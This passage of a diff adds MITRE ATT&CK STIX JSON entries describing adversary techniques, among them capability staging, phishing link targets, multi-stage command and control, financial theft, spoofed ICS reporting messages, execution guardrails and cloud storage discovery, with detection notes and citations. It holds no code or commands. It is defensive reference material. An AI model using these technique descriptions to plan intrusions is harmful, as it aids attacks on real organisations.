by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)\n* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "created": "2021-03-17T20:04:09.331Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1608", + "external_id": "T1608" + }, + { + "source_name": "Volexity Ocean Lotus November 2020", + "description": "Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.", + "url": "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/" + }, + { + "source_name": "Netskope GCP Redirection", + "description": "Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.", + "url": "https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection" + }, + { + "source_name": "Netskope Cloud Phishing", + "description": "Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.", + "url": "https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service" + }, + { + "source_name": "ATT ScanBox", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + }, + { + "source_name": "DigiCert Install SSL Cert", + "description": "DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.", + "url": "https://www.digicert.com/kb/ssl-certificate-installation.htm" + }, + { + "source_name": "Gallagher 2015", + "description": "Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.", + "url": "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" + }, + { + "source_name": "Malwarebytes Heroku Skimmers", + "description": "Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", + "url": "https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku" + }, + { + "source_name": "Dragos Heroku Watering Hole", + "description": "Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.", + "url": "https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/" + }, + { + "source_name": "FireEye CFR Watering Hole 2012", + "description": "Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html" + }, + { + "source_name": "Malwarebytes Silent Librarian October 2020", + "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.", + "url": "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/" + }, + { + "source_name": "Proofpoint TA407 September 2019", + "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.", + "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:57:26.842Z", + "name": "Link Target", + "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001).\n\nLinks can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)\n\nAdversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Goldstein Menachem", + "Hen Porcilan", + "Diyar Saadi Ali", + "Nikola Kovac" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701", + "created": "2021-03-17T20:35:08.429Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1608/005", + "external_id": "T1608.005" + }, + { + "source_name": "Netskope GCP Redirection", + "description": "Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.", + "url": "https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection" + }, + { + "source_name": "Netskope Cloud Phishing", + "description": "Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.", + "url": "https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service" + }, + { + "source_name": "URI Unique", + "description": "Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.", + "url": "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF" + }, + { + "source_name": "Kaspersky-masking", + "description": "Dedenok, Roman. (2023, December 12). How cybercriminals disguise URLs. Retrieved January 17, 2024.", + "url": "https://www.kaspersky.com/blog/malicious-redirect-methods/50045/" + }, + { + "source_name": "Talos IPFS 2022", + "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.", + "url": "https://blog.talosintelligence.com/ipfs-abuse/" + }, + { + "source_name": "Malwarebytes Silent Librarian October 2020", + "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.", + "url": "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/" + }, + { + "source_name": "URI", + "description": "Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.", + "url": "https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits" + }, + { + "source_name": "URI Use", + "description": "Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.", + "url": "https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf" + }, + { + "source_name": "iOS URL Scheme", + "description": "Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.", + "url": "https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html" + }, + { + "source_name": "Intezer App Service Phishing", + "description": "Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.", + "url": "https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/" + }, + { + "source_name": "Proofpoint TA407 September 2019", + "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.", + "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian" + }, + { + "source_name": "Cofense-redirect", + "description": "Raymond, Nathaniel. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved January 17, 2024.", + "url": "https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/" + }, + { + "source_name": "mandiant-masking", + "description": "Simonian, Nick. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved January 17, 2024.", + "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Multi-Stage Channels", + "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "created": "2017-05-31T21:31:15.935Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1104", + "external_id": "T1104" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-11T20:22:14.359Z", + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Blake Strom, Microsoft Threat Intelligence", + "Pawel Partyka, Microsoft Threat Intelligence", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "created": "2023-08-18T20:50:04.222Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1657", + "external_id": "T1657" + }, + { + "source_name": "VEC", + "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.", + "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers." + }, + { + "source_name": "Crowdstrike-leaks", + "description": "Crowdstrike. (2020, September 24). Double Trouble: Ransomware with Data Leak Extortion, Part 1. Retrieved December 6, 2023.", + "url": "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" + }, + { + "source_name": "Mandiant-leaks", + "description": "DANIEL KAPELLMANN ZAFRA, COREY HIDELBRANDT, NATHAN BRUBAKER, KEITH LUNDEN. (2022, January 31). 1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information. Retrieved August 18, 2023.", + "url": "https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs" + }, + { + "source_name": "DOJ-DPRK Heist", + "description": "Department of Justice. (2021). 3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe. Retrieved August 18, 2023.", + "url": "https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and" + }, + { + "source_name": "FBI-BEC", + "description": "FBI. (2022). FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud. Retrieved August 18, 2023.", + "url": "https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view" + }, + { + "source_name": "FBI-ransomware", + "description": "FBI. (n.d.). Ransomware. Retrieved August 18, 2023.", + "url": "https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf" + }, + { + "source_name": "AP-NotPetya", + "description": "FRANK BAJAK AND RAPHAEL SATTER. (2017, June 30). Companies still hobbled from fearsome cyberattack. Retrieved August 18, 2023.", + "url": "https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2" + }, + { + "source_name": "Internet crime report 2022", + "description": "IC3. (2022). 2022 Internet Crime Report. Retrieved August 18, 2023.", + "url": "https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf" + }, + { + "source_name": "BBC-Ronin", + "description": "Joe Tidy. (2022, March 30). Ronin Network: What a $600m hack says about the state of crypto. Retrieved August 18, 2023.", + "url": "https://www.bbc.com/news/technology-60933174" + }, + { + "source_name": "wired-pig butchering", + "description": "Lily Hay Newman. (n.d.). ‘Pig Butchering’ Scams Are Now a $3 Billion Threat. Retrieved August 18, 2023.", + "url": "https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/" + }, + { + "source_name": "NYT-Colonial", + "description": "Nicole Perlroth. (2021, May 13). Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers.. Retrieved August 18, 2023.", + "url": "https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:07.260Z", + "name": "Spoof Reporting Message", + "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. \n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Operational Databases: Device Alarm", + "Windows Registry: Windows Registry Key Modification", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0856", + "external_id": "T0856" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Execution Guardrails", + "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Nick Carr, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host Forensic Analysis", + "Signature-based Detection", + "Static File Analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "created": "2019-01-31T02:10:08.261Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1480", + "external_id": "T1480" + }, + { + "source_name": "FireEye Outlook Dec 2019", + "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html" + }, + { + "source_name": "FireEye Kevin Mandia Guardrails", + "description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.", + "url": "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Cloud Storage Object Discovery", + "description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Regina Elwell", + "Isif Ibrahima, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. \nMonitor cloud logs for API calls used for file or object enumeration for unusual activity. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156", + "created": "2021-10-01T17:58:26.445Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1619", + "external_id": "T1619" + }, + { + "source_name": "ListObjectsV2", + "description": "Amazon - ListObjectsV2. Retrieved October 4, 2021.", + "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html" + }, + { + "source_name": "List Blobs", + "description": "Microsoft - List Blobs. (n.d.). Retrieved October 4, 2021.", + "url": "https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:07.457Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)\n\nICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (wormable) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. (Citation: Joe Slowik April 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0866", + "external_id": "T0866" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Exploitation of Remote Services Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1210/" + }, + { + "source_name": "Joe Slowik April 2019", + "description": 